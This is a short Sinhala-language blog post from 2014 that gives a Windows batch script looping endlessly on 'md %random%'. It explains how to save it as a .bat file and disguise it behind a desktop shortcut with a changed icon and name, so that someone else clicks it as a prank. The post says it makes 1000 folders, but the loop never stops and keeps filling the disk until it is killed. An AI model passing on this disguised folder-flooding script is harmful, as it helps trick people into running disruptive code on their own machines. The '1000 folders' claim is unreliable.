Tuesday, August 26, 2014

1000 Folder - එක පාරින් ෆෝල්ඩර් 1000ක්

1000 Folder - එක පාරින් ෆෝල්ඩර් 1000ක්

ක්ලික් කරපු ගමන් ෆෝල්ඩර් 1000ක්  හැදෙන්න පොඩි කෝඩ් එකක් ගැනයි මේ කියන්නෙ. පහල කෝඩ් එක නෝට්පෑඩ් එකක ලියගෙන සේවු කරගන්න.  

@echo off
:top
md %random%
goto top
ඊලගට මේක කැමති නමකින් සේවු කරගන්න .bat විදියට 
පහල ආකරයේ අයිකොන් එකක් හම්බෙයි. 
මෙකේ Shortcut එකක් හදන්න Desktop එකට 
ඊලගට මෙ ෆයිල් එකෙ Properties ගන්න 
Change Icon වලට ගිහින් කැමති එකකට මාරු කරන්න 
නමත් මරු කරන්න. 
හරි, මේ වගෙ එකක් දැක්කාම ක්ලික් කරපු ගමන් එක පාරින් ෆෝල්ඩර් 1000ක්  හැදෙනවා නියම ෆන් එක.. 


No comments:

Post a Comment